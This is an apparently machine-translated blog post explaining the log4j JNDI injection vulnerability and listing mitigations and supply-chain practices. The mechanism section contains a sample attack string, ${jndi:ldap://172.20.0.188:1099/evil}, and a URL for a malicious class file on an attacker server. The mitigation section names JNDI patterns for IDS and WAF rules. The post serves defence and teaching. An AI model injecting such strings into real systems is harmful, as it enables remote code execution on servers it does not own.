Information security - Epic vulnerability log4j vulnerability mechanism and preventive measures

Recently, you r & D students must have been log4j The hole is terrible , In the morning 2 Click one after another to fix the vulnerability . And one version has been repaired , And burst out again and again 2.15,2.16 Loopholes bypass , Rise to 2.17 Version of . Bother 、 Bother 、 Bother .

experienced , We have to understand log4j What is the loophole , How was this vulnerability exploited , What are the consequences .

log4j There are two kinds of vulnerability mechanisms , Don't talk much , Upper figure ;

1. utilize log4j Trigger Ldap、 And make use of ldap Find the principle attack path

2. utilize log4j Trigger RMI Attack path

We usually keep logs ：logger.inf("this is a log content"); This will be recorded in the log file this is a log content.

         however log4j For some special , Such as ：logger.info(${jndi:ldap://172.20.0.188:1099/evil});,log4j2 This line of string to be output will be parsed , It found... In the string ${, It has to be dealt with separately , Found to be JNDI Extended content .

         Right again JNDI Further analysis , It was found that LDAP agreement ,LDAP The server 172.20.0.188:1099, You're looking for key yes evil, Then call the specific responsible LDAP To request the corresponding data . The problem is coming. ！JNDI Support a method called named reference , That is to say JNDI It can be downloaded remotely class File to build objects ！！！ Load and build objects after downloading , We are such a big move that we are shocked .

         If downloaded remotely URL It points to a hacker's server (http://172.20.0.188:80/excute.class), And downloaded class There is malicious code in the file , It's too late , Any consequence may occur , This is a JNDI Inject .

Protection and solution

1、 Check code , Upgrade to a safe version in time , This vulnerability also involves many Apache Open source project , This part should also be updated in time , Use the latest version 2.17.0.

2、 Malicious traffic may exist jndi:ladp:// jdni:rmi,IDS and WAF You can write corresponding rules to check out attack traffic from traffic ;

3、 add to jvm Launch parameters -Dlog4j2.formatMsgNoLookups=true

4、 Modify the configuration file log4j2.formatMsgNoLookups=True

5、 Modify environment variables FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS Set to true

6、 Turn off unnecessary internet requests ;

7、 Ban lookup or JNDI service ;

8、jdk Upgrade to the latest version ;

from log4j Thinking about loopholes in the construction of emergency response capacity

1. Open source components introduce specifications ： Consider unification log4j And other open source components , We only need to introduce a few common versions , After safety inspection, it is stored in the company maven The private server library is for research and development , Other unverified versions are not allowed to be introduced ; If you need to quote private servers, consider going to approval 、 Enter after safety verification maven Private servers ;

2. Development model ： The application of all component packages adopts java Rely on Management , Component dependency adopts rating pom Import ; Each time you upgrade components, you only need to upgrade the top pom, Other programs that use components only need to recompile and pull the latest package to complete the component upgrade , There is no need to change pom;

3.CICD Deploy the platform side ： Deployment and startup of all programs , Both sides of the platform need to have control and response capabilities ; such as ：java programmatic shell The startup script must be in CICD Partial platformization on the deployment platform , adopt CICD The platform can uniformly modify the startup command and complete the restart operation , Let the platform have the ability of rapid response ;

4. Asset platform side ： It is necessary to clarify which applications have access to the Internet , What open source components do these applications use , What is the version of the corresponding open source component . Through the asset platform, we can quickly locate the risk status of existing applications ;

5. Code detection platform ： Time match cve The vulnerable version in the open source component in is different from the existing version , And it can generate alarms and trigger alarm disposal process ;

6. From the perspective of zero trust , The zero trust platform is log4j Loopholes can play a role ： With the help of the model of zero trust and only trust white list , All requirements for calling external interfaces from the company's intranet need to be filed on the zero trust platform , If an untrusted call chain is found , Trigger the alarm immediately ;